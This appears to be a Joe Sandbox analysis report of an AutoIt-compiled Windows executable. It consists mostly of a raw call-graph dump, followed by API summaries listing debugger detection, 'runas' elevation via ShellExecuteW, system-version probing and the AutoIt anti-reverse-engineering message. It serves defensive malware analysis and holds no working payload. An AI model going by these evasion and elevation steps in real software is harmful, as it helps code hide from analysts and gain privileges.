2d3717 97002->97003 97004 26684a 40 API calls 97003->97004 97005 2d3727 97004->97005 97006 26684a 40 API calls 97005->97006 97016 2d3700 97016->96834 97019 28017b 8 API calls 97018->97019 97020 2ca028 __fread_nolock 97019->97020 97020->96851 97022 2d1524 97021->97022 97023 28014b 8 API calls 97022->97023 97024 
2d153b 97023->97024 97025 26b329 8 API calls 97024->97025 97028 26bc33 97027->97028 97034 26bbb9 __fread_nolock 97027->97034 97030 28017b 8 API calls 97028->97030 97029 28014b 8 API calls 97031 26bbc0 97029->97031 97030->97034 97033 28014b 8 API calls 97031->97033 97034->97029 97036 265d34 97035->97036 97040 265dd8 97035->97040 97037 28017b 8 API calls 97036->97037 97039 265d66 97036->97039 97037->97039 97038 28014b 8 API calls 97038->97039 97039->97038 97039->97040 97040->96851 97042 2666f1 97041->97042 97043 2666f8 97041->97043 97047->96845 97048->96851 97049->96849 97051 266656 GetProcAddress 97050->97051 97052 266674 97050->97052 97053 266666 97051->97053 97055 28e95b 97052->97055 97053->97052 97054 26666d FreeLibrary 97053->97054 97054->97052 97087 28e89a 97055->97087 97057 266698 97057->96876 97057->96877 97059 26661c GetProcAddress 97058->97059 97060 26663b 97058->97060 97061 26662c 97059->97061 97063 266720 97060->97063 97061->97060 97062 266634 FreeLibrary 97061->97062 97062->97060 97064 28017b 8 API calls 97063->97064 97065 266735 97064->97065 97139 26423c 97065->97139 97067 266741 __fread_nolock 97068 2a56c2 97067->97068 97073 26677c 97067->97073 97147 2d3a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 97067->97147 97148 2d3a92 74 API calls 97068->97148 97071 26684a 40 API calls 97071->97073 97072 2a5706 97142 266874 97072->97142 97073->97071 97073->97072 97074 266874 64 API calls 97073->97074 97076 266810 messages 97073->97076 97074->97073 97076->96884 97078 26684a 40 API calls 97078->97076 97080 26685c 97079->97080 97082 2a5760 97079->97082 97180 28ec34 97080->97180 97084 2d32bd 97289 2d310d 97084->97289 97086 2d32d8 97086->96892 97090 28e8a6 CallCatchBlock 97087->97090 97088 28e8b4 97112 28f649 20 API calls _free 97088->97112 97090->97088 97092 28e8e4 97090->97092 97091 28e8b9 97113 292b5c 26 API calls _strftime 97091->97113 97094 28e8e9 97092->97094 97095 28e8f6 97092->97095 97114 28f649 20 API calls _free 
97094->97114 97104 2983e1 97095->97104 97098 28e8ff 97099 28e905 97098->97099 97101 28e912 97098->97101 97115 28f649 20 API calls _free 97099->97115 97116 28e944 LeaveCriticalSection __fread_nolock 97101->97116 97103 28e8c4 __wsopen_s 97103->97057 97105 2983ed CallCatchBlock 97104->97105 97117 2932d1 EnterCriticalSection 97105->97117 97107 2983fb 97118 29847b 97107->97118 97111 29842c __wsopen_s 97111->97098 97112->97091 97113->97103 97114->97103 97115->97103 97116->97103 97117->97107 97127 29849e 97118->97127 97119 2984f7 97121 294ff0 BuildCatchObjectHelperInternal 20 API calls 97119->97121 97120 298408 97131 298437 97120->97131 97122 298500 97121->97122 97124 292d38 _free 20 API calls 97122->97124 97125 298509 97124->97125 97125->97120 97136 293778 11 API calls 2 library calls 97125->97136 97127->97119 97127->97120 97134 2894fd EnterCriticalSection 97127->97134 97135 289511 LeaveCriticalSection 97127->97135 97128 298528 97137 2894fd EnterCriticalSection 97128->97137 97138 293319 LeaveCriticalSection 97131->97138 97133 29843e 97133->97111 97134->97127 97135->97127 97136->97128 97137->97120 97138->97133 97140 28014b 8 API calls 97139->97140 97141 26424e 97140->97141 97141->97067 97143 266883 97142->97143 97144 2a5780 97142->97144 97149 28f053 97143->97149 97147->97068 97148->97073 97152 28ee1a 97149->97152 97151 266891 97151->97078 97153 28ee26 CallCatchBlock 97152->97153 97154 28ee32 97153->97154 97155 28ee58 97153->97155 97177 28f649 20 API calls _free 97154->97177 97165 2894fd EnterCriticalSection 97155->97165 97158 28ee37 97178 292b5c 26 API calls _strftime 97158->97178 97159 28ee64 97166 28ef7a 97159->97166 97162 28ee78 97179 28ee97 LeaveCriticalSection __fread_nolock 97162->97179 97164 28ee42 __wsopen_s 97164->97151 97165->97159 97167 28ef9c 97166->97167 97168 28ef8c 97166->97168 97169 28eea1 28 API calls 97167->97169 97170 28f649 _free 20 API calls 97168->97170 97172 28efbf 97169->97172 97171 28ef91 97170->97171 97171->97162 97173 28f03e 97172->97173 97174 
28df7b 62 API calls 97172->97174 97173->97162 97175 28efe6 97174->97175 97176 2997a4 __wsopen_s 28 API calls 97175->97176 97176->97173 97177->97158 97178->97164 97179->97164 97183 28ec51 97180->97183 97182 26686d 97182->97084 97184 28ec5d CallCatchBlock 97183->97184 97185 28ec9d 97184->97185 97186 28ec95 __wsopen_s 97184->97186 97191 28ec70 ___scrt_fastfail 97184->97191 97196 2894fd EnterCriticalSection 97185->97196 97186->97182 97188 28eca7 97197 28ea68 97188->97197 97210 28f649 20 API calls _free 97191->97210 97192 28ec8a 97211 292b5c 26 API calls _strftime 97192->97211 97196->97188 97198 28ea97 97197->97198 97201 28ea7a ___scrt_fastfail 97197->97201 97212 28ecdc LeaveCriticalSection __fread_nolock 97198->97212 97199 28ea87 97285 28f649 20 API calls _free 97199->97285 97201->97198 97201->97199 97203 28eada __fread_nolock 97201->97203 97203->97198 97206 28ebf6 ___scrt_fastfail 97203->97206 97213 28dcc5 97203->97213 97220 2990c5 97203->97220 97287 28d2e8 26 API calls 4 library calls 97203->97287 97288 28f649 20 API calls _free 97206->97288 97208 28ea8c 97286 292b5c 26 API calls _strftime 97208->97286 97210->97192 97211->97186 97212->97186 97214 28dcd1 97213->97214 97215 28dce6 97213->97215 97216 28f649 _free 20 API calls 97214->97216 97215->97203 97217 28dcd6 97216->97217 97218 292b5c _strftime 26 API calls 97217->97218 97219 28dce1 97218->97219 97219->97203 97221 2990ef 97220->97221 97222 2990d7 97220->97222 97224 299459 97221->97224 97229 299134 97221->97229 97223 28f636 __dosmaperr 20 API calls 97222->97223 97225 2990dc 97223->97225 97226 28f636 __dosmaperr 20 API calls 97224->97226 97227 28f649 _free 20 API calls 97225->97227 97228 29945e 97226->97228 97230 2990e4 97227->97230 97231 28f649 _free 20 API calls 97228->97231 97229->97230 97232 29913f 97229->97232 97236 29916f 97229->97236 97230->97203 97233 29914c 97231->97233 97234 28f636 __dosmaperr 20 API calls 97232->97234 97237 292b5c _strftime 26 API calls 97233->97237 97235 299144 97234->97235 97238 28f649 
_free 20 API calls 97235->97238 97239 299188 97236->97239 97240 2991ae 97236->97240 97243 2991ca 97236->97243 97237->97230 97238->97233 97239->97240 97241 299195 97239->97241 97242 28f636 __dosmaperr 20 API calls 97240->97242 97248 29fc1b __fread_nolock 26 API calls 97241->97248 97245 2991b3 97242->97245 97244 293b93 __fread_nolock 21 API calls 97243->97244 97246 2991e1 97244->97246 97247 28f649 _free 20 API calls 97245->97247 97249 292d38 _free 20 API calls 97246->97249 97250 2991ba 97247->97250 97251 299333 97248->97251 97252 2991ea 97249->97252 97253 292b5c _strftime 26 API calls 97250->97253 97254 2993a9 97251->97254 97257 29934c GetConsoleMode 97251->97257 97255 292d38 _free 20 API calls 97252->97255 97282 2991c5 __fread_nolock 97253->97282 97256 2993ad ReadFile 97254->97256 97258 2991f1 97255->97258 97259 299421 GetLastError 97256->97259 97260 2993c7 97256->97260 97257->97254 97261 29935d 97257->97261 97262 2991fb 97258->97262 97263 299216 97258->97263 97264 29942e 97259->97264 97265 299385 97259->97265 97260->97259 97266 29939e 97260->97266 97261->97256 97267 299363 ReadConsoleW 97261->97267 97269 28f649 _free 20 API calls 97262->97269 97271 2997a4 __wsopen_s 28 API calls 97263->97271 97270 28f649 _free 20 API calls 97264->97270 97273 28f613 __dosmaperr 20 API calls 97265->97273 97265->97282 97278 2993ec 97266->97278 97279 299403 97266->97279 97266->97282 97267->97266 97272 29937f GetLastError 97267->97272 97268 292d38 _free 20 API calls 97268->97230 97271->97241 97272->97265 97273->97282 97279->97282 97282->97268 97285->97208 97286->97198 97287->97203 97288->97208 97292 28e858 97289->97292 97291 2d311c 97291->97086 97295 28e7d9 97292->97295 97294 28e875 97294->97291 97296 28e7e8 97295->97296 97297 28e7fc 97295->97297 97303 28f649 20 API calls _free 97296->97303 97302 28e7f8 __alldvrm 97297->97302 97305 2936b2 11 API calls 2 library calls 97297->97305 97299 28e7ed 97304 292b5c 26 API calls _strftime 97299->97304 97302->97294 97303->97299 97304->97302 
97305->97302 97307 2a22d0 __wsopen_s 97306->97307 97376->96903 97377->96911 97413 2d383b 97412->97413 97414 26684a 40 API calls 97413->97414 97415 2d36fc 97413->97415 97416 2d32bd 27 API calls 97413->97416 97417 266874 64 API calls 97413->97417 97414->97413 97415->97002 97415->97016 97416->97413 97417->97413 97514->96671 97516 2639eb 97515->97516 97517 265f4e 97515->97517 97516->96680 97549 2cd11f 42 API calls _strftime 97516->97549 97517->97516 97518 2a5070 DestroyIcon 97517->97518 97518->97516 97520 2661c6 97519->97520 97521 2662a8 97519->97521 97550 267ad5 97520->97550 97521->96682 97524 2a5278 LoadStringW 97528 2a5292 97524->97528 97525 2661e1 97526 268577 8 API calls 97525->97526 97527 2661f6 97526->97527 97529 266203 97527->97529 97536 2a52ae 97527->97536 97531 26bed9 8 API calls 97528->97531 97535 266229 ___scrt_fastfail 97528->97535 97529->97528 97530 26620d 97529->97530 97532 266b7c 8 API calls 97530->97532 97531->97535 97533 26621b 97532->97533 97534 267bb5 8 API calls 97533->97534 97534->97535 97537 26628e Shell_NotifyIconW 97535->97537 97536->97535 97538 26bf73 8 API calls 97536->97538 97539 2a52f1 97536->97539 97537->97521 97540 2a52d8 97538->97540 97556 27fe6f 51 API calls 97539->97556 97555 2ca350 9 API calls 97540->97555 97543 2a5310 97545 266b7c 8 API calls 97543->97545 97544 2a52e3 97546 267bb5 8 API calls 97544->97546 97547 2a5321 97545->97547 97546->97539 97548 266b7c 8 API calls 97547->97548 97548->97535 97549->96680 97551 28017b 8 API calls 97550->97551 97552 267afa 97551->97552 97553 28014b 8 API calls 97552->97553 97554 2661d4 97553->97554 97554->97524 97554->97525 97555->97544 97556->97543 97558 266bb4 _wcslen 97557->97558 97559 266bc7 97558->97559 97560 2a5860 97558->97560 97567 267d74 97559->97567 97561 28014b 8 API calls 97560->97561 97564 2a586a 97561->97564 97563 266bd4 __fread_nolock 97563->96701 97565 28017b 8 API calls 97564->97565 97566 2a589a __fread_nolock 97565->97566 97568 267d8a 97567->97568 97571 267d85 __fread_nolock 
97567->97571 97569 2a6528 97568->97569 97570 28017b 8 API calls 97568->97570 97570->97571 97571->97563 97573 267be7 97572->97573 97578 267c1b __fread_nolock 97572->97578 97574 2a644e 97573->97574 97575 267c0e 97573->97575 97573->97578 97576 28014b 8 API calls 97574->97576 97577 267d74 8 API calls 97575->97577 97579 2a645d 97576->97579 97577->97578 97578->96710 97580 28017b 8 API calls 97579->97580 97581 2a6491 __fread_nolock 97580->97581 97582->96711 97583 26f5e5 97586 26cab0 97583->97586 97587 26cacb 97586->97587 97588 2b14be 97587->97588 97589 2b150c 97587->97589 97614 26caf0 97587->97614 97592 2b14c8 97588->97592 97595 2b14d5 97588->97595 97588->97614 97631 2e62ff 207 API calls 2 library calls 97589->97631 97629 2e6790 207 API calls 97592->97629 97612 26cdc0 97595->97612 97630 2e6c2d 207 API calls 2 library calls 97595->97630 97598 2b179f 97598->97598 97600 26cf80 39 API calls 97600->97614 97601 27e807 39 API calls 97601->97614 97604 2b16e8 97633 2e6669 81 API calls 97604->97633 97607 26be2d 39 API calls 97607->97614 97608 26cdee 97609 26b4c8 8 API calls 97609->97614 97612->97608 97634 2d3fe1 81 API calls __wsopen_s 97612->97634 97613 270340 207 API calls 97613->97614 97614->97600 97614->97601 97614->97604 97614->97607 97614->97608 97614->97609 97614->97612 97614->97613 97615 26bed9 8 API calls 97614->97615 97617 27e7c1 39 API calls 97614->97617 97618 27aa99 207 API calls 97614->97618 97619 2805b2 5 API calls __Init_thread_wait 97614->97619 97620 27bc58 97614->97620 97625 280413 29 API calls __onexit 97614->97625 97626 280568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97614->97626 97627 27f4df 81 API calls 97614->97627 97628 27f346 207 API calls 97614->97628 97632 2bffaf 8 API calls 97614->97632 97615->97614 97617->97614 97618->97614 97619->97614 97621 28014b 8 API calls 97620->97621 97622 27bc65 97621->97622 97623 26b329 8 API calls 97622->97623 97624 27bc70 97623->97624 97624->97614 97625->97614 97626->97614 97627->97614 97628->97614 
97629->97595 97630->97612 97631->97614 97632->97614 97633->97612 97634->97598 97635 28f06e 97636 28f07a CallCatchBlock 97635->97636 97637 28f09b 97636->97637 97638 28f086 97636->97638 97648 2894fd EnterCriticalSection 97637->97648 97654 28f649 20 API calls _free 97638->97654 97641 28f0a7 97649 28f0db 97641->97649 97642 28f08b 97655 292b5c 26 API calls _strftime 97642->97655 97647 28f096 __wsopen_s 97648->97641 97657 28f106 97649->97657 97651 28f0e8 97652 28f0b4 97651->97652 97677 28f649 20 API calls _free 97651->97677 97656 28f0d1 LeaveCriticalSection __fread_nolock 97652->97656 97654->97642 97655->97647 97656->97647 97658 28f12e 97657->97658 97659 28f114 97657->97659 97661 28dcc5 __fread_nolock 26 API calls 97658->97661 97681 28f649 20 API calls _free 97659->97681 97663 28f137 97661->97663 97662 28f119 97682 292b5c 26 API calls _strftime 97662->97682 97678 299789 97663->97678 97667 28f23b 97668 28f248 97667->97668 97675 28f1ee 97667->97675 97684 28f649 20 API calls _free 97668->97684 97669 28f1bf 97671 28f1dc 97669->97671 97669->97675 97683 28f41f 31 API calls 4 library calls 97671->97683 97673 28f1e6 97674 28f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 97673->97674 97674->97651 97675->97674 97685 28f29b 30 API calls 2 library calls 97675->97685 97677->97652 97686 299606 97678->97686 97680 28f153 97680->97667 97680->97669 97680->97674 97681->97662 97682->97674 97683->97673 97684->97674 97685->97674 97687 299612 CallCatchBlock 97686->97687 97688 29961a 97687->97688 97689 299632 97687->97689 97721 28f636 20 API calls _free 97688->97721 97691 2996e6 97689->97691 97695 29966a 97689->97695 97726 28f636 20 API calls _free 97691->97726 97692 29961f 97722 28f649 20 API calls _free 97692->97722 97711 2954ba EnterCriticalSection 97695->97711 97696 2996eb 97727 28f649 20 API calls _free 97696->97727 97699 299670 97701 2996a9 97699->97701 97702 299694 97699->97702 97700 2996f3 97728 292b5c 26 API calls _strftime 97700->97728 97712 29970b 97701->97712 97723 28f649 20 API 
calls _free 97702->97723 97704 299627 __wsopen_s 97704->97680 97707 299699 97724 28f636 20 API calls _free 97707->97724 97708 2996a4 97725 2996de LeaveCriticalSection __wsopen_s 97708->97725 97711->97699 97729 295737 97712->97729 97714 29971d 97715 299725 97714->97715 97716 299736 SetFilePointerEx 97714->97716 97742 28f649 20 API calls _free 97715->97742 97718 29974e GetLastError 97716->97718 97720 29972a 97716->97720 97743 28f613 20 API calls 2 library calls 97718->97743 97720->97708 97721->97692 97722->97704 97723->97707 97724->97708 97725->97704 97726->97696 97727->97700 97728->97704 97730 295759 97729->97730 97731 295744 97729->97731 97735 29577e 97730->97735 97746 28f636 20 API calls _free 97730->97746 97744 28f636 20 API calls _free 97731->97744 97734 295749 97745 28f649 20 API calls _free 97734->97745 97735->97714 97736 295789 97747 28f649 20 API calls _free 97736->97747 97739 295751 97739->97714 97740 295791 97748 292b5c 26 API calls _strftime 97740->97748 97742->97720 97743->97720 97744->97734 97745->97739 97746->97736 97747->97740 97748->97739 97749 26f4c0 97752 27a025 97749->97752 97751 26f4cc 97753 27a046 97752->97753 97758 27a0a3 97752->97758 97754 270340 207 API calls 97753->97754 97753->97758 97759 27a077 97754->97759 97756 2b806b 97756->97756 97757 27a0e7 97757->97751 97758->97757 97761 2d3fe1 81 API calls __wsopen_s 97758->97761 97759->97757 97759->97758 97760 26bed9 8 API calls 97759->97760 97760->97758 97761->97756 97762 298782 97767 29853e 97762->97767 97765 2987aa 97772 29856f try_get_first_available_module 97767->97772 97769 29876e 97786 292b5c 26 API calls _strftime 97769->97786 97771 2986c3 97771->97765 97779 2a0d04 97771->97779 97775 2986b8 97772->97775 97782 28917b 40 API calls 2 library calls 97772->97782 97774 29870c 97774->97775 97783 28917b 40 API calls 2 library calls 97774->97783 97775->97771 97785 28f649 20 API calls _free 97775->97785 97777 29872b 97777->97775 97784 28917b 40 API calls 2 library calls 97777->97784 97787 2a0401 
97779->97787 97781 2a0d1f 97781->97765 97782->97774 97783->97777 97784->97775 97785->97769 97786->97771 97789 2a040d CallCatchBlock 97787->97789 97788 2a041b 97845 28f649 20 API calls _free 97788->97845 97789->97788 97791 2a0454 97789->97791 97798 2a09db 97791->97798 97792 2a0420 97846 292b5c 26 API calls _strftime 97792->97846 97797 2a042a __wsopen_s 97797->97781 97848 2a07af 97798->97848 97801 2a0a0d 97880 28f636 20 API calls _free 97801->97880 97802 2a0a26 97866 295594 97802->97866 97805 2a0a12 97881 28f649 20 API calls _free 97805->97881 97806 2a0a2b 97807 2a0a4b 97806->97807 97808 2a0a34 97806->97808 97879 2a071a CreateFileW 97807->97879 97882 28f636 20 API calls _free 97808->97882 97812 2a0a39 97883 28f649 20 API calls _free 97812->97883 97814 2a0b01 GetFileType 97816 2a0b0c GetLastError 97814->97816 97817 2a0b53 97814->97817 97815 2a0ad6 GetLastError 97885 28f613 20 API calls 2 library calls 97815->97885 97886 28f613 20 API calls 2 library calls 97816->97886 97888 2954dd 21 API calls 3 library calls 97817->97888 97818 2a0a84 97818->97814 97818->97815 97884 2a071a CreateFileW 97818->97884 97822 2a0b1a CloseHandle 97822->97805 97825 2a0b43 97822->97825 97824 2a0ac9 97824->97814 97824->97815 97887 28f649 20 API calls _free 97825->97887 97826 2a0b74 97831 2a0bc0 97826->97831 97889 2a092b 72 API calls 4 library calls 97826->97889 97828 2a0b48 97828->97805 97833 2a0bed 97831->97833 97890 2a04cd 72 API calls 4 library calls 97831->97890 97832 2a0be6 97832->97833 97834 2a0bfe 97832->97834 97891 298a2e 97833->97891 97836 2a0478 97834->97836 97837 2a0c7c CloseHandle 97834->97837 97847 2a04a1 LeaveCriticalSection __wsopen_s 97836->97847 97906 2a071a CreateFileW 97837->97906 97839 2a0ca7 97840 2a0cdd 97839->97840 97841 2a0cb1 GetLastError 97839->97841 97840->97836 97907 28f613 20 API calls 2 library calls 97841->97907 97843 2a0cbd 97908 2956a6 21 API calls 3 library calls 97843->97908 97845->97792 97846->97797 97847->97797 97849 2a07d0 97848->97849 97850 2a07ea 
97848->97850 97849->97850 97916 28f649 20 API calls _free 97849->97916 97909 2a073f 97850->97909 97853 2a07df 97917 292b5c 26 API calls _strftime 97853->97917 97855 2a0822 97856 2a0851 97855->97856 97918 28f649 20 API calls _free 97855->97918 97864 2a08a4 97856->97864 97920 28da7d 26 API calls 2 library calls 97856->97920 97859 2a089f 97861 2a091e 97859->97861 97859->97864 97860 2a0846 97919 292b5c 26 API calls _strftime 97860->97919 97921 292b6c 11 API calls _abort 97861->97921 97864->97801 97864->97802 97865 2a092a 97867 2955a0 CallCatchBlock 97866->97867 97924 2932d1 EnterCriticalSection 97867->97924 97869 2955ee 97925 29569d 97869->97925 97870 2955cc 97928 295373 21 API calls 3 library calls 97870->97928 97873 295617 __wsopen_s 97873->97806 97874 2955a7 97874->97869 97874->97870 97876 29563a EnterCriticalSection 97874->97876 97875 2955d1 97875->97869 97929 2954ba EnterCriticalSection 97875->97929 97876->97869 97877 295647 LeaveCriticalSection 97876->97877 97877->97874 97879->97818 97880->97805 97881->97836 97882->97812 97883->97805 97884->97824 97885->97805 97886->97822 97887->97828 97888->97826 97889->97831 97890->97832 97892 295737 __wsopen_s 26 API calls 97891->97892 97895 298a3e 97892->97895 97893 298a44 97931 2956a6 21 API calls 3 library calls 97893->97931 97895->97893 97896 298a76 97895->97896 97897 295737 __wsopen_s 26 API calls 97895->97897 97896->97893 97898 295737 __wsopen_s 26 API calls 97896->97898 97900 298a6d 97897->97900 97901 298a82 CloseHandle 97898->97901 97899 298a9c 97902 298abe 97899->97902 97932 28f613 20 API calls 2 library calls 97899->97932 97903 295737 __wsopen_s 26 API calls 97900->97903 97901->97893 97904 298a8e GetLastError 97901->97904 97902->97836 97903->97896 97904->97893 97906->97839 97907->97843 97908->97840 97910 2a0757 97909->97910 97912 2a0772 97910->97912 97922 28f649 20 API calls _free 97910->97922 97912->97855 97913 2a0796 97923 292b5c 26 API calls _strftime 97913->97923 97915 2a07a1 97915->97855 97916->97853 
97917->97850 97918->97860 97919->97856 97920->97859 97921->97865 97922->97913 97923->97915 97924->97874 97930 293319 LeaveCriticalSection 97925->97930 97927 2956a4 97927->97873 97928->97875 97929->97869 97930->97927 97931->97899 97932->97902 97933 29947a 97934 299487 97933->97934 97937 29949f 97933->97937 97983 28f649 20 API calls _free 97934->97983 97936 29948c 97984 292b5c 26 API calls _strftime 97936->97984 97939 2994fa 97937->97939 97947 299497 97937->97947 97985 2a0144 21 API calls 2 library calls 97937->97985 97941 28dcc5 __fread_nolock 26 API calls 97939->97941 97942 299512 97941->97942 97953 298fb2 97942->97953 97944 299519 97945 28dcc5 __fread_nolock 26 API calls 97944->97945 97944->97947 97946 299545 97945->97946 97946->97947 97948 28dcc5 __fread_nolock 26 API calls 97946->97948 97949 299553 97948->97949 97949->97947 97950 28dcc5 __fread_nolock 26 API calls 97949->97950 97951 299563 97950->97951 97952 28dcc5 __fread_nolock 26 API calls 97951->97952 97952->97947 97954 298fbe CallCatchBlock 97953->97954 97955 298fde 97954->97955 97956 298fc6 97954->97956 97957 2990a4 97955->97957 97961 299017 97955->97961 97987 28f636 20 API calls _free 97956->97987 97994 28f636 20 API calls _free 97957->97994 97960 298fcb 97988 28f649 20 API calls _free 97960->97988 97964 29903b 97961->97964 97965 299026 97961->97965 97962 2990a9 97995 28f649 20 API calls _free 97962->97995 97986 2954ba EnterCriticalSection 97964->97986 97989 28f636 20 API calls _free 97965->97989 97969 299033 97996 292b5c 26 API calls _strftime 97969->97996 97970 29902b 97990 28f649 20 API calls _free 97970->97990 97971 299041 97974 29905d 97971->97974 97975 299072 97971->97975 97972 298fd3 __wsopen_s 97972->97944 97991 28f649 20 API calls _free 97974->97991 97977 2990c5 __fread_nolock 38 API calls 97975->97977 97979 29906d 97977->97979 97993 29909c LeaveCriticalSection __wsopen_s 97979->97993 97980 299062 97992 28f636 20 API calls _free 97980->97992 97983->97936 97984->97947 97985->97939 97986->97971 
97987->97960 97988->97972 97989->97970 97990->97969 97991->97980 97992->97979 97993->97972 97994->97962 97995->97969 97996->97972 97997 2636f5 98000 26370f 97997->98000 98001 263726 98000->98001 98002 263788 98001->98002 98003 26378a 98001->98003 98004 26372b 98001->98004 98007 26376f DefWindowProcW 98002->98007 98008 263790 98003->98008 98009 2a3df4 98003->98009 98005 263804 PostQuitMessage 98004->98005 98006 263738 98004->98006 98013 263709 98005->98013 98010 263743 98006->98010 98011 2a3e61 98006->98011 98007->98013 98014 263797 98008->98014 98015 2637bc SetTimer RegisterWindowMessageW 98008->98015 98055 262f92 10 API calls 98009->98055 98016 26380e 98010->98016 98017 26374d 98010->98017 98058 2cc8f7 65 API calls ___scrt_fastfail 98011->98058 98021 2637a0 KillTimer 98014->98021 98022 2a3d95 98014->98022 98015->98013 98018 2637e5 CreatePopupMenu 98015->98018 98045 27fcad 98016->98045 98023 2a3e46 98017->98023 98024 263758 98017->98024 98018->98013 98020 2a3e15 98056 27f23c 40 API calls 98020->98056 98030 263907 Shell_NotifyIconW 98021->98030 98028 2a3d9a 98022->98028 98029 2a3dd0 MoveWindow 98022->98029 98023->98007 98057 2c1423 8 API calls 98023->98057 98031 2637f2 98024->98031 98032 263763 98024->98032 98025 2a3e73 98025->98007 98025->98013 98033 2a3dbf SetFocus 98028->98033 98034 2a3da0 98028->98034 98029->98013 98035 2637b3 98030->98035 98053 26381f 75 API calls ___scrt_fastfail 98031->98053 98032->98007 98042 263907 Shell_NotifyIconW 98032->98042 98033->98013 98034->98032 98038 2a3da9 98034->98038 98052 2659ff DeleteObject DestroyWindow 98035->98052 98054 262f92 10 API calls 98038->98054 98040 263802 98040->98013 98043 2a3e3a 98042->98043 98044 26396b 60 API calls 98043->98044 98044->98002 98046 27fcc5 ___scrt_fastfail 98045->98046 98047 27fd4b 98045->98047 98048 2661a9 55 API calls 98046->98048 98047->98013 98050 27fcec 98048->98050 98049 27fd34 KillTimer SetTimer 98049->98047 98050->98049 98051 2bfe2b Shell_NotifyIconW 98050->98051 98051->98049 

Control-flow Graph

• Executed
• Not Executed
APIs
• GetVersionExW.KERNEL32(?), ref: 00265FF7
  • Part of subcall function 00268577: _wcslen.LIBCMT ref: 0026858A
• GetCurrentProcess.KERNEL32(?,002FDC2C,00000000,?,?), ref: 00266123
• IsWow64Process.KERNEL32(00000000,?,?), ref: 0026612A
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00266155
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00266167
• GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00266175
• FreeLibrary.KERNEL32(00000000,?,?), ref: 0026617C
• GetSystemInfo.KERNEL32(?,?,?), ref: 002661A1
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225
• Opcode ID: b61fea44e3781e6881753cb1839f1c155238e1a33e0e2be575aca8ace0313c42
• Instruction ID: 2a166295c5c8a8bcf31ba494d652d8fa6ed676ad4b4a25086bf5bf488af52d25
• Opcode Fuzzy Hash: b61fea44e3781e6881753cb1839f1c155238e1a33e0e2be575aca8ace0313c42
• Instruction Fuzzy Hash: 63A1A63992A2E5CFC713CB687CC51A77F6D6B27320F0848A9E44597322C67D4598CB31

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00263368,?), ref: 002633BB
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00263368,?), ref: 002633CE
• GetFullPathNameW.KERNEL32(00007FFF,?,?,00332418,00332400,?,?,?,?,?,?,00263368,?), ref: 0026343A
  • Part of subcall function 00268577: _wcslen.LIBCMT ref: 0026858A
  • Part of subcall function 0026425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00263462,00332418,?,?,?,?,?,?,?,00263368,?), ref: 002642A0
• SetCurrentDirectoryW.KERNEL32(?,00000001,00332418,?,?,?,?,?,?,?,00263368,?), ref: 002634BB
• MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 002A3CB0
• SetCurrentDirectoryW.KERNEL32(?,00332418,?,?,?,?,?,?,?,00263368,?), ref: 002A3CF1
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003231F4,00332418,?,?,?,?,?,?,?,00263368), ref: 002A3D7A
• ShellExecuteW.SHELL32(00000000,?,?), ref: 002A3D81
  • Part of subcall function 002634D3: GetSysColorBrush.USER32(0000000F), ref: 002634DE
  • Part of subcall function 002634D3: LoadCursorW.USER32(00000000,00007F00), ref: 002634ED
                                                                                                                                                                          • Part of subcall function 002634D3: LoadIconW.USER32(00000063), ref: 00263503
                                                                                                                                                                          • Part of subcall function 002634D3: LoadIconW.USER32(000000A4), ref: 00263515
                                                                                                                                                                          • Part of subcall function 002634D3: LoadIconW.USER32(000000A2), ref: 00263527
                                                                                                                                                                          • Part of subcall function 002634D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0026353F
                                                                                                                                                                          • Part of subcall function 002634D3: RegisterClassExW.USER32(?), ref: 00263590
                                                                                                                                                                          • Part of subcall function 002635B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002635E1
                                                                                                                                                                          • Part of subcall function 002635B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00263602
                                                                                                                                                                          • Part of subcall function 002635B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00263368,?), ref: 00263616
                                                                                                                                                                          • Part of subcall function 002635B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00263368,?), ref: 0026361F
                                                                                                                                                                          • Part of subcall function 0026396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00263A3C
                                                                                                                                                                        Strings
                                                                                                                                                                        • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 002A3CAA
                                                                                                                                                                        • 0$3, xrefs: 00263495
                                                                                                                                                                        • runas, xrefs: 002A3D75
                                                                                                                                                                        • AutoIt, xrefs: 002A3CA5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
